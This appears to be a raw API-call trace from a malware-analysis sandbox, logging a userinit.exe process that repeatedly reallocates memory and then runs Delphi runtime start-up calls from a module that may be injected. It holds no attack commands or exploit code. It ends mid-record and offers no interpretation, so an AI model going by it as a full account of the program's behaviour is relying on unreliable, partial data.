[0209.844] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb4000, uFlags=0x2) returned 0x36000c
[0209.860] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.861] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.861] GlobalUnlock (hMem=0x36000c) returned 0
[0209.861] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb6000, uFlags=0x2) returned 0x36000c
[0209.876] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.877] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.877] GlobalUnlock (hMem=0x36000c) returned 0
[0209.878] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb8000, uFlags=0x2) returned 0x36000c
[0209.890] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.890] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.890] GlobalUnlock (hMem=0x36000c) returned 0
[0209.890] GlobalReAlloc (hMem=0x36000c, dwBytes=0xba000, uFlags=0x2) returned 0x36000c
[0209.903] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.903] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.904] GlobalUnlock (hMem=0x36000c) returned 0
[0209.904] GlobalReAlloc (hMem=0x36000c, dwBytes=0xbc000, uFlags=0x2) returned 0x36000c
[0209.917] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.917] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.917] GlobalUnlock (hMem=0x36000c) returned 0
[0209.917] GlobalReAlloc (hMem=0x36000c, dwBytes=0xbe000, uFlags=0x2) returned 0x36000c
[0209.930] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.931] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.931] GlobalUnlock (hMem=0x36000c) returned 0
[0209.931] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc0000, uFlags=0x2) returned 0x36000c
[0209.944] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.945] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.945] GlobalUnlock (hMem=0x36000c) returned 0
[0209.945] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc2000, uFlags=0x2) returned 0x36000c
[0209.959] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.960] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.960] GlobalUnlock (hMem=0x36000c) returned 0
[0209.960] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc4000, uFlags=0x2) returned 0x36000c
[0209.972] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.973] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.973] GlobalUnlock (hMem=0x36000c) returned 0
[0209.973] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc6000, uFlags=0x2) returned 0x36000c
[0210.033] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.034] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.034] GlobalUnlock (hMem=0x36000c) returned 0
[0210.034] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc8000, uFlags=0x2) returned 0x36000c
[0210.048] GlobalLock (hMem=0x36000c) returned 0xde0020
[0210.049] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0210.049] GlobalUnlock (hMem=0x36000c) returned 0
[0210.049] GlobalReAlloc (hMem=0x36000c, dwBytes=0xca000, uFlags=0x2) returned 0x36000c
[0210.062] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.062] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.062] GlobalUnlock (hMem=0x36000c) returned 0
[0210.062] GlobalReAlloc (hMem=0x36000c, dwBytes=0xcc000, uFlags=0x2) returned 0x36000c
[0210.077] GlobalLock (hMem=0x36000c) returned 0xde0020
[0210.077] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0210.077] GlobalUnlock (hMem=0x36000c) returned 0
[0210.077] GlobalReAlloc (hMem=0x36000c, dwBytes=0xce000, uFlags=0x2) returned 0x36000c
[0210.100] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.101] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.101] GlobalUnlock (hMem=0x36000c) returned 0
[0210.101] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd0000, uFlags=0x2) returned 0x36000c
[0210.118] GlobalLock (hMem=0x36000c) returned 0xde0020
[0210.119] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0210.119] GlobalUnlock (hMem=0x36000c) returned 0
[0210.119] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd2000, uFlags=0x2) returned 0x36000c
[0210.199] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.200] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.200] GlobalUnlock (hMem=0x36000c) returned 0
[0210.200] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd4000, uFlags=0x2) returned 0x36000c
[0210.218] GlobalLock (hMem=0x36000c) returned 0xde0020
[0210.229] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0210.229] GlobalUnlock (hMem=0x36000c) returned 0
[0210.229] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd6000, uFlags=0x2) returned 0x36000c
[0210.246] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.247] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.247] GlobalUnlock (hMem=0x36000c) returned 0
[0210.247] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd8000, uFlags=0x2) returned 0x36000c
[0210.262] GlobalLock (hMem=0x36000c) returned 0xde0020
[0210.262] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0210.262] GlobalUnlock (hMem=0x36000c) returned 0
[0210.262] GlobalReAlloc (hMem=0x36000c, dwBytes=0xda000, uFlags=0x2) returned 0x36000c
[0210.277] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.278] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.278] GlobalUnlock (hMem=0x36000c) returned 0
[0210.278] GlobalReAlloc (hMem=0x36000c, dwBytes=0xdc000, uFlags=0x2) returned 0x36000c
[0210.296] GlobalLock (hMem=0x36000c) returned 0xde0020
[0210.297] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0210.297] GlobalUnlock (hMem=0x36000c) returned 0
[0210.297] GlobalReAlloc (hMem=0x36000c, dwBytes=0xde000, uFlags=0x2) returned 0x36000c
[0210.314] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.315] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.315] GlobalUnlock (hMem=0x36000c) returned 0
[0210.315] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe0000, uFlags=0x2) returned 0x36000c
[0210.357] GlobalLock (hMem=0x36000c) returned 0x27e0020
[0210.358] GlobalHandle (pMem=0x27e0020) returned 0x36000c
[0210.358] GlobalUnlock (hMem=0x36000c) returned 0
[0210.358] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe2000, uFlags=0x2) returned 0x36000c
[0210.376] GlobalLock (hMem=0x36000c) returned 0x28d0020
[0210.377] GlobalHandle (pMem=0x28d0020) returned 0x36000c
[0210.377] GlobalUnlock (hMem=0x36000c) returned 0
[0210.377] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe4000, uFlags=0x2) returned 0x36000c
[0210.443] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.444] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.444] GlobalUnlock (hMem=0x36000c) returned 0
[0210.444] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe6000, uFlags=0x2) returned 0x36000c
[0210.463] GlobalLock (hMem=0x36000c) returned 0x27f0020
[0210.463] GlobalHandle (pMem=0x27f0020) returned 0x36000c
[0210.464] GlobalUnlock (hMem=0x36000c) returned 0
[0210.464] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe8000, uFlags=0x2) returned 0x36000c
[0210.533] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.534] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.534] GlobalUnlock (hMem=0x36000c) returned 0
[0210.534] GlobalReAlloc (hMem=0x36000c, dwBytes=0xea000, uFlags=0x2) returned 0x36000c
[0210.553] GlobalLock (hMem=0x36000c) returned 0x27f0020
[0210.554] GlobalHandle (pMem=0x27f0020) returned 0x36000c
[0210.554] GlobalUnlock (hMem=0x36000c) returned 0
[0210.554] GlobalReAlloc (hMem=0x36000c, dwBytes=0xec000, uFlags=0x2) returned 0x36000c
[0210.572] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.573] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.573] GlobalUnlock (hMem=0x36000c) returned 0
[0210.573] GlobalReAlloc (hMem=0x36000c, dwBytes=0xee000, uFlags=0x2) returned 0x36000c
[0210.639] GlobalLock (hMem=0x36000c) returned 0x27f0020
[0210.641] GlobalHandle (pMem=0x27f0020) returned 0x36000c
[0210.641] GlobalUnlock (hMem=0x36000c) returned 0
[0210.641] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf0000, uFlags=0x2) returned 0x36000c
[0210.660] GlobalLock (hMem=0x36000c) returned 0x28e0020
[0210.661] GlobalHandle (pMem=0x28e0020) returned 0x36000c
[0210.661] GlobalUnlock (hMem=0x36000c) returned 0
[0210.661] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf2000, uFlags=0x2) returned 0x36000c
[0210.728] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.729] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.729] GlobalUnlock (hMem=0x36000c) returned 0
[0210.730] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf4000, uFlags=0x2) returned 0x36000c
[0210.746] GlobalLock (hMem=0x36000c) returned 0x2800020
[0210.747] GlobalHandle (pMem=0x2800020) returned 0x36000c
[0210.747] GlobalUnlock (hMem=0x36000c) returned 0
[0210.747] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf6000, uFlags=0x2) returned 0x36000c
[0210.764] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.812] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.812] GlobalUnlock (hMem=0x36000c) returned 0
[0210.812] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf8000, uFlags=0x2) returned 0x36000c
[0210.830] GlobalLock (hMem=0x36000c) returned 0x2800020
[0210.830] GlobalHandle (pMem=0x2800020) returned 0x36000c
[0210.830] GlobalUnlock (hMem=0x36000c) returned 0
[0210.830] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfa000, uFlags=0x2) returned 0x36000c
[0210.847] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.848] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.848] GlobalUnlock (hMem=0x36000c) returned 0
[0210.848] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfc000, uFlags=0x2) returned 0x36000c
[0210.914] GlobalLock (hMem=0x36000c) returned 0x2800020
[0210.915] GlobalHandle (pMem=0x2800020) returned 0x36000c
[0210.915] GlobalUnlock (hMem=0x36000c) returned 0
[0210.915] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfe000, uFlags=0x2) returned 0x36000c
[0210.932] GlobalLock (hMem=0x36000c) returned 0x2700020
[0210.933] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0210.933] GlobalUnlock (hMem=0x36000c) returned 0
[0210.933] GlobalReAlloc (hMem=0x36000c, dwBytes=0x100000, uFlags=0x2) returned 0x36000c
[0210.951] GlobalLock (hMem=0x36000c) returned 0x2800020
[0210.952] GlobalHandle (pMem=0x2800020) returned 0x36000c
[0210.952] GlobalUnlock (hMem=0x36000c) returned 0
[0210.952] GlobalReAlloc (hMem=0x36000c, dwBytes=0x102000, uFlags=0x2) returned 0x36000c
[0211.017] GlobalLock (hMem=0x36000c) returned 0x2910020
[0211.018] GlobalHandle (pMem=0x2910020) returned 0x36000c
[0211.018] GlobalUnlock (hMem=0x36000c) returned 0
[0211.018] GlobalReAlloc (hMem=0x36000c, dwBytes=0x104000, uFlags=0x2) returned 0x36000c
[0211.036] GlobalLock (hMem=0x36000c) returned 0x2700020
[0211.037] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0211.037] GlobalUnlock (hMem=0x36000c) returned 0
[0211.037] GlobalReAlloc (hMem=0x36000c, dwBytes=0x106000, uFlags=0x2) returned 0x36000c
[0211.147] GlobalLock (hMem=0x36000c) returned 0x2810020
[0211.148] GlobalHandle (pMem=0x2810020) returned 0x36000c
[0211.148] GlobalUnlock (hMem=0x36000c) returned 0
[0211.148] GlobalReAlloc (hMem=0x36000c, dwBytes=0x108000, uFlags=0x2) returned 0x36000c
[0211.169] GlobalLock (hMem=0x36000c) returned 0x2700020
[0211.170] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0211.170] GlobalUnlock (hMem=0x36000c) returned 0
[0211.170] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10a000, uFlags=0x2) returned 0x36000c
[0211.244] GlobalLock (hMem=0x36000c) returned 0x2810020
[0211.245] GlobalHandle (pMem=0x2810020) returned 0x36000c
[0211.245] GlobalUnlock (hMem=0x36000c) returned 0
[0211.245] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10c000, uFlags=0x2) returned 0x36000c
[0211.263] GlobalLock (hMem=0x36000c) returned 0x2700020
[0211.264] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2810000
[0211.311] VirtualAlloc (lpAddress=0x2810000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2810000
[0211.343] GetKeyboardType (nTypeFlag=0) returned 4
[0211.343] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0211.343] GetStartupInfoA (in: lpStartupInfo=0x1af568 | out: lpStartupInfo=0x1af568*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0211.344] GetVersion () returned 0x1db10106
[0211.344] GetVersion () returned 0x1db10106
[0211.344] GetCurrentThreadId () returned 0x994
[0211.344] GetModuleFileNameA (in: hModule=0x2920000, lpFilename=0x1af064, nSize=0x105 | out: lpFilename="tð\x1a" (normalized: "c:\\windows\\system32\\tð\x1a")) returned 0x0
[0211.344] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aef3f, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0211.344] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af054 | out: phkResult=0x1af054*=0x0) returned 0x2
[0211.344] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af054 | out: phkResult=0x1af054*=0x0) returned 0x2
[0211.344] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af054 | out: phkResult=0x1af054*=0x0) returned 0x2
[0211.344] lstrcpynA (in: lpString1=0x1aef3f, lpString2="tð\x1a", iMaxLength=261 | out: lpString1="tð\x1a") returned="tð\x1a"
[0211.344] GetThreadLocale () returned 0x409
[0211.344] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x1af04f, cchData=5 | out: lpLCData="ENU") returned 4
[0211.344] lstrlenA (lpString="tð\x1a") returned 3
[0211.344] LoadStringA (in: hInstance=0x2920000, uID=0xffc4, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0211.344] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x27dcc0
[0211.344] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a40000
[0211.344] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x27ecc0
[0211.344] VirtualAlloc (lpAddress=0x2a40000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a40000
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffc3, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffc1, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffc2, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffd4, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffdd, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffd3, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffd0, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffd7, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffd6, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffe8, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffe9, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffea, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffe7, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffe5, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffe3, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffe2, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffe1, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffe0, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffff, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfffe, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfffd, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfffc, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfffb, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfffa, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfff9, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfff8, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfff7, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfff6, lpBuffer=0x1af188, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xfff4, lpBuffer=0x1af174, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0211.345] LoadStringA (in: hInstance=0x2920000, uID=0xffe4, lpBuffer=0x1af174, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0211.346] GetVersionExA (in: lpVersionInformation=0x1af50c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2920000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<